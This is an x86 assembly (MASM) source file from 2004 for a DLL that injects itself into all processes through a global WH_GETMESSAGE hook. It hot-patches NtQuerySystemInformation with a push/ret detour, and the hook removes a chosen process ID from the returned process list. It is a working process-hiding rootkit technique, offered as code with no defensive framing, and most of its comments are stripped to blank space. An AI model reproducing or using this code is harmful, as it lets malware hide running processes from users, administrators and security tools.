;********************************************************************
;*             20.07.2004  (Team HomeWork)              *
;*                   e-mail: sne_pro@mail.ru                        *
;******************************************************************** 

; 	################## : ####################
;
; 		    ,  
;	    .
; 		 ,   cbEmptyProc,   
;	   . !  ,   
;	 DllEntry   DLL_PROCESS_ATTACH,  
;	 "", ..  .  -
;	     	, 
;	NTQuerySystemInformation  ""   Hook_NtQuerySysInfo,
;	  ,  ,   ,
;	,      ,  
;	 NTQuerySystemInformation.
;
; 	################## /: ####################

.486
.model flat, stdcall
option casemap:none

	include	phantom.inc

	InterceptFunctions 	proto

.code

DllEntry proc hInst:DWORD, reason:DWORD, unused:DWORD
	.if reason == DLL_PROCESS_ATTACH
 		mov eax, hInst
 		mov hInstance, eax

 		invoke GetModuleFileName, \		; ,     dll
 				hInstance, \			;  ,     dll
 				offset sShare, MAX_PATH	;     ;)

 		invoke fnReplace, '\'			;   .   '_'
 		invoke fnReplace, ':'			;  sShare
;		(          ?)

 		invoke GetCurrentProcess		;    
 		mov hcProcess, eax				;           
 										;  FFFFFFFFh
 		call InterceptFunctions			;     
 										;    ,   6 . 
 	.elseif reason == DLL_PROCESS_DETACH
 		call RestoreFunctions			;  ,  
 	.endif

	mov eax, TRUE						;      
	ret
DllEntry endp

;	   
InterceptFunctions proc
	invoke GetModuleHandle, offset sModuleName			;  hModule
	invoke GetProcAddress, eax, offset sFunctnName		;   

	or eax, eax							;   
	jz @ret

	mov adr_APIFunction, eax			;  ...

	mov jump.instr_push, 68h			; push 			\
	mov jump.arg, Hook_NtQuerySysInfo	;    	: = 6 
	mov jump.instr_ret, 0C3h			; ret				   /

 										;    oldData,  
  	invoke ReadProcessMemory, hcProcess, adr_APIFunction, addr oldData, sizeof jump, addr written 

	cmp written, sizeof jump			;  ,    6  "" ...
	jne	@ret
 										;    "" 
	invoke WriteProcessMemory, hcProcess, adr_APIFunction, addr jump, sizeof jump, addr written

	xor eax, eax						;  ,  FALSE
	cmp written, sizeof jump
	jne	@ret
	mov eax, TRUE						;    6 ,  
	
@ret:
	ret
InterceptFunctions endp

;	 
RestoreFunctions proc
	invoke WriteProcessMemory, hcProcess, adr_APIFunction, addr oldData, sizeof jump, addr written
	
	xor eax, eax						;  True,  
	cmp written, sizeof jump
	jne @ret
	mov eax, TRUE 	
@ret:
	ret
RestoreFunctions endp

;	    CallBack  ;)    NtQuerySystemInformation
Hook_NtQuerySysInfo proc dwType:DWORD, SysInfo:DWORD, SysInfoLen:DWORD,  ReturnLength:DWORD
	LOCAL fn_ret:DWORD					;    NtQuerySystemInformation

	call RestoreFunctions				;  ,   
	or	eax, eax						;    ,    
	jz	@ret

	push ReturnLength					; \
	push SysInfoLen						;  |
	push SysInfo						;  |   ,    adr_APIFunction
	push dwType							;  |
	call adr_APIFunction				; /
	mov fn_ret, eax

	cmp dwType, SystemProcessInformation;     
	jne	@ret

	mov esi, SysInfo					;    
	xor edi, edi
@loop:

	invoke GetShareDword				;    PID ,   
	.if (eax == [esi][44h])				; 4    44h - PID  . inc 			
 		.if (dword ptr [esi] == NULL)	;    
 			mov dword ptr [edi], NULL	;     OFFSET  , ..  ...

 		.elseif (edi != NULL)			;   ... (edi     , ..   [System idle])
 			mov eax, dword ptr [esi]	;       
 			add eax, dword ptr [edi]	;     ,  ""      :)
 			mov dword ptr [edi], eax	;   OFFSET   
 		.endif
	.endif

	mov eax, [esi]						; ,    OFFSET 
	or  eax, eax						;  ,       
	jz	@ret							;   

	mov edi, esi						;  ,       
	add esi, [esi]						;   OFFSET'
	jmp @loop							; 

@ret:									;  ,   ,   .     
	invoke WriteProcessMemory, hcProcess, adr_APIFunction, addr jump, sizeof jump, addr written
	mov eax, fn_ret						;     

	ret
Hook_NtQuerySysInfo endp

;	   ...
cbEmptyProc proc nCode:DWORD, wParam:DWORD, lParam:DWORD
	invoke CallNextHookEx, hHook, nCode, wParam, lParam
	ret
cbEmptyProc endp

;	    hInstance
ModuleFromAddress proc pv:DWORD
	LOCAL mbi:MEMORY_BASIC_INFORMATION

	xor eax, eax								
	invoke VirtualQuery, pv, addr mbi, sizeof mbi

	or eax, eax
	jz	@ret
 										; Pointer to the base address of a range of
	mov eax, mbi.AllocationBase			; pages allocated by the VirtualAlloc function.
@ret:									; The page pointed to by the BaseAddress member
	ret									; is contained within this allocation range.
ModuleFromAddress endp

SetGlobalHook proc  fInstall:DWORD, \	; 1 -  , 0 -   
 					cPID:DWORD			; ID ,   . 0 -  

	cmp fInstall, FALSE					;    
	jz	unhook

	cmp hHook, NULL						;      
	jnz	@ret							;      !?

	.if (cPID == NULL)					;  ProcessId  ,  
 		Call GetCurrentProcessId
	.else								;  !?   
 		mov eax, cPID
	.endif
	invoke SetShareDword, eax			;  !

	invoke ModuleFromAddress, \
 						SetGlobalHook
	invoke SetWindowsHookEx, \			;   
 						WH_GETMESSAGE, 	; Installs a hook procedure that monitors messages posted to a message queue 
 						cbEmptyProc, \	;   
 						eax, \			; Application instance
 						NULL			; !

	mov hHook, eax						; ,  ;)
	jmp @ret							; ...

unhook:
	invoke UnhookWindowsHookEx, hHook	;  
	mov hHook, NULL						; ...   .   
	invoke DelShareDword				;    DWORD   PID'
@ret:
	ret
SetGlobalHook endp

SetGlobalHook4 proc fInstall:DWORD, cPID:DWORD, Reserved1:DWORD, Reserved2:DWORD
	invoke SetGlobalHook, fInstall, cPID
	ret
SetGlobalHook4 endp

End DllEntry